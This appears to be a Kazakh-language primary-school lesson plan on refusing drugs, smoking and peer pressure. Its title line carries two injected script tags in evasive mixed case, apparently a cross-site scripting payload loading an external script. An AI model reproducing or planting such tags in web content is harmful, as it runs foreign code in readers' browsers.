Бастауыш сынып оқушыларымен жүргізілетін тренеингтің түрі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
02.04.2021
Тақырыбы «Зиянды әдеттерге – жол жоқ!»
Мақсаты: Салауатты өмір салтын ұстанудың адам өміріндегі маңыздылығы туралы түсініктерін кеңейте отырып, шынайы болмысын
іздеуіне үйрету. Өзіне және іс-әрекетіне жауапкершілікті қалыптастыру
Міндеті:
- Шешім қабылдау дағдысы мен «жоқ» деп айтуды қалыптастыру;
- Топ қысымына қарсы тұра қабілетін игерту.
1. Сәлемдесу
Нұсқау: Әр қатысушы өз есімім және болашақта кім болғысы келетінін айтып шығуы керек.
- Сіздердің осы таңдаған болашақтағы армандарыңның орындалуы үшін сіздер қандай өмір салтын ұстануларың керек?
- Қоғамға үлкен дерт әкелетін қандай зиянды заттар бар?
(Оқушылар өз ойларымен бөліседі)
2.Тақырып бойынша жұмыс
Нұсқау: «Өмірде кейбір жағдайға «жоқ» деп жауап беруімізге тура келеді. Егер сізге есірткені немесе шылымды таратып көруді сұранса, өзіңізге сенімді түрде кері жауап беру қажет. «Ойланып көрейін», «кішкене тартып көрермін» деген сөз ұсынушыға мүмкіндік береді. Нақты анық қысқа байсалды «жоқ» деп жауап беріп үйренген жөн. Бүгін біз соның екі түрімен танысамыз.
1. Ену – сөздің қызығушылығыңыз бен саналы талдауыңызға қарсы келетін кез келген әрекетке кері жауап беру. Себебі, оған ата-ана, заң ереже, мұғалім тиым салған.
2. «Иә, бірақ...» - сізге ұсынылғанмен келісесіз, бірақ өзіңіздің бірнеше нұсқаңызды ұсынасыз. Оқушыларға тыйым салынатын бейтаныс заттарды алуға, оны қолдануға болмайтынын есеріп отыру қажет.
Жуманова С.Е.